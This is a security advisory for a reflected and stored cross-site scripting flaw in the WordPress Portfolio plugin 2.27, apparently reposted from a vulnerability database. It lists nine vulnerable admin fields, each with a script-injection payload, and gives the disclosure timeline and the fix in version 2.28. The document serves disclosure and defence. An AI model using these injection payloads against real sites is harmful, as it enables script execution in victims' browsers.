WordPress Portfolio 2.27 Cross Site Scripting

2015.12.18
Credit: Madhu Akula
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Plugin Name : Portfolio Effected Version : 2.27 (and most probably lower version's if any) Vulnerability : A3-Cross-Site Scripting (XSS) Identified by : Madhu Akula Technical Details Minimum Level of Access Required : Administrator PoC - (Proof of Concept) : The following fields put the payload as below http://localhost/wp-admin/admin.php?page=portfolio.php tag-slug = ?><script>alert(1)</script> prtfl_date_text_field = ?><script>alert(2)</script> prtfl_link_text_field = ?><script>alert(3)</script> prtfl_shrdescription_text_field = ?><script>alert(4)</script> prtfl_description_text_field = ?><script>alert(5)</script> prtfl_svn_text_field = ?><script>alert(6)</script> prtfl_executor_text_field = ?><script>alert(7)</script> prtfl_screenshot_text_field = ?><script>alert(8)</script> prtfl_technologies_text_field = ?><script>alert(9)</script> Vulnerable Parameter : tag-slug, prtfl_date_text_field, prtfl_link_text_field, prtfl_shrdescription_text_field, prtfl_description_text_field, prtfl_svn_text_field, prtfl_executor_text_field, prtfl_screenshot_text_field, prtfl_technologies_text_field Type of XSS : Reflected / Stored Fixed in : 2.28 http://wordpress.org/plugins/portfolio/changelog/ Disclosure Timeline Vendor Contacted : 2014-08-04 Plugin Status : Updated on 2014-08-07 Public Disclosure : October 3, 2015 CVE Number : Not assigned yet Plugin Description : With the Portfolio plugin you can create a unique page for displaying portfolio items consisting of screenshots and additional information such as description, short description, URL, date of completion, etc. Moreover you can add not just one, but many screenshots to one portfolio item for better visual guidance.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top